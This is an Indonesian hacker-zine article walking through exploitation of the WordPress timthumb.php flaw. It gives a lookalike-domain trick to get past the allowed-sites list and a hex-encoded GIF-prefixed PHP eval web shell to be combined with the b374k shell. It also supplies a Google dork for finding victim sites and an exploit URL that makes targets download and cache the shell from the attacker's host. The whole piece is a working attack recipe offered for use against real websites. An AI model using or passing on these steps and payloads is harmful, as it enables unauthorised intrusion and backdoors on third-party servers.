.;.-' ; ;; ;; ;' ;. ;' ;; ;;.;.-' `:::'`;;;;'.;` ``;;'( ;_.;:._.'; ;; `:::' `-' ; `. ECHO MAGAZINE VOLUME IX, ISSUE XXIV, PHILE 0x08.TXT Hacker Log Book: WP-Timthumb Exploitation - jos_ali_joe a.k.a tempe_mendoan failed404/at/gmail/com/com -----[ Pendahuluan Sebelum nya Banyak sekali artikel tentang timthumb yang sedang ramai di bicarakan saat ini karena itu Dalam tulisan ini saya sekedar menulis tulisan tentang timthumb. Dalam theme wordpress saat ini kebanyakan atau menggunakan timthumb karena plugin ini kegunaan nya adalah untuk croping dan resize images. Exploit timthumb.php ini pertama kali di publish oleh Mark Maunder ( Vulnerability Disclosed ) di dalam website pribadi nya, dan kemudian di kembangkan kembali oleh ( Vulnerability Researched ) Nah lanjut yo dalam tulisan atau artikel kali ini saya ingin mengembangkan exploitasi timthumb.php secara berbeda yang di gunakan oleh Maxe Walaupun methode nya sama tapi di sini langsung menggunakan remote injection melalui website domain :D Dalam methode Maxe yang di gunakan adalah TimThumbCraft, untuk lebih jelas nya bisa mampir ke sini http://www.exploit-db.com/wordpress-timthumb-exploitation/ -----[ Proses Kerja Timthumb.php adalah sebuah script php untuk mengubah ukuran gambar di website , timthum.php sendiri kebanyakan atau hampir 90% di gunakan oleh theme Wordpress Dari semua permintaan fitur TimThumb yang paling populer adalah mampu untuk memotong gambar dari suatu tempat tertentu, dan mampu memuat gambar dari situs web eksternal. Secara default TimThumb dapat mengubah ukuran gambar host di flickr.com, picasa.com, blogger.com, wordpress.com, dan img.youtube.com. -----[ Remote Code Injection Timthumb.php 1. Add Domain maksud dari add domain di sini adalah add domain website kita , di sini saya memberikan contoh : domain website saya adalah fansecho.com nah di sini saya add domain saya menjadi blogger.com.fansecho.com nah kenapa saya membuat domain seperti itu ? Karena di sini timthumb adalah default plugin yang hanya bisa mengubah ukuran gambar dari domain berikut : ---------------------------------------------== $allowedSites = array ( 'flickr.com', 'picasa.com', 'blogger.com', 'wordpress.com', 'img.youtube.com', 'upload.wikimedia.org', ); ------------------------------------------------ Nah maksud dari $allowedSites adalah timthumb.phpp hanya bisa mengambil image dari luar (external image) dari situs di atas. ------------------------------------------------ if (strpos (strtolower ($src), 'http://') !== false || strpos (strtolower ($src) , 'https://') !== false)
if (strpos (strtolower ($url_info['host']), $site) !== false) ------------------------------------------------ Ingat untuk domain yang saya gunakan tadi blogger.com.fansecho.com hanya sebuah contoh bisa juga flickr.com.fansecho.com , atau domain yang ada di list 2. Create Shell Maksud dari Create shell adalah di sini kita menambahkan code image GIF yang telah kita Decode, ------------------------------------------------ \x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00 \xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00 \x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02 \x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65 \x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D \x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00 ------------------------------------------------ Kode Hex di atas kita Decode ke String, dan hasil nya : ------------------------------------------------ GIF89a????????!????,???????D?;? ------------------------------------------------ Kode di atas kita masukan di atas script shell, di sini saya menggunakan shell b374k : ------------------------------------------------ GIF89a????????!????,???????D?;? <?php // ketek90@gmail.com // no malware on this code, you can check it by yourself ;-) @error_reporting(0); @set_time_limit(0); $code = "script shell" ------------------------------------------------ ingat di sini kita masukan kode hasil Yang telah kita decode tadi di atas <?php di sini saya save shell tersebut dengan ekstensi b374k.php 3. Upload Shell in Domain Website Yupz lanjut lagi setelah tadi sudah kita persiapkan senjata atau shell b374k.php untuk inject kita upload tadi ke domain website kita, di atas tadi saya sudah add domain blogger.com.fansecho.com nah sekarang kita upload shell b374k.php Dan hasil dari shell b374k.php yang telah di upload di website tersebut adalah http:\\blogger.com.fansecho.com/b374k.php 4. Exploitasi Nah setelah tadi sudah upload shel inject atau senjata tadi yang berada di http:\\blogger.com.fansecho.com/b374k.php sekarang waktunya kita mencari target di si mbah google :D Di sini saya menggunakan dork dari timthumb.php adalah : inurl:/wp-content/themes/cityguide/timthumb.php Setelah sudah mendapatkan target waktunya exploitasi , contoh untuk eksploitasi nya adalah : http://contohtarget.com/wp-content/themes/cityguide/timthumb.php?src=http:\\blo gger.com.fansecho.com/b374k.php Setelah masuk akan ada pemberitauan : http://contohtarget.com/wp-content/themes/cityguide/../cache/external_565bcf5de 88a16ded694ed62e29a.php setelah terdapat tulisan seperti itu coba kita buka apakah hasil nya masuk atau tidak , tapi kebanyakn memang jika sudah seperti itu kita telah masuk dan sudah menanam shell :D , yuk mari buka link tersebut : http://contohtarget.com/wp-content/themes/cityguide/cache/external_565bcf5de88a 16ded694ed62e29a.php Nah setelah shell masuk terserah mau di apakan , pergunakan lah sebaik2 nya .. x ixixixixixi -----[ Note 1. Untuk versi timthumb.php 1.* - 1.32 ini masih banyak yang bisa kita eksploitasi, untuk versi 1.32 mungkin sudah tidak bisa di eksploitasi karena telah di upadte dari develop nya 2. Untuk dork dari timthumb.php bisa ke list berikut : WordPress Themes (timthumb.php) Multiple Vulnerabilites : http://1337day.com/exp loits/16966 Multiple Wordpress Plugin timthumb.php Vulnerabilites : http://www.exploit-db.co m/exploits/17872/ 3.Nah untuk biar lebih lezat aka enak bisa langsung ke video nya : http://www.securitytube.net/video/2348 -----[ Referensi [x] http://www.exploit-db.com/wordpress-timthumb-exploitation/ [x] http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/ [x] http://khairu.net/index.php/page/artikel/2/0day_timthumb.php_wp_plugin_explo itasi [x] google & chatroom di IRC -----[ Thanks Exploit Id - Indonesian Coder - Explore Crew - DevilzCode - Byroe - Echo - 0netc r3w [+] zaki_22 siap kang \m/ , r3m1ck , kaMtiEz , ibl13Z [+] Dan teman2 semua yang mungkin tidak bisa menyebutkan satu2 , makasih atas dukungan nya selama ini :) [+] Makasih El- Farhatz , Eidelweiss dan Pak Iwan Soemantri atas 2 minggu yang saya tidak menyangka :D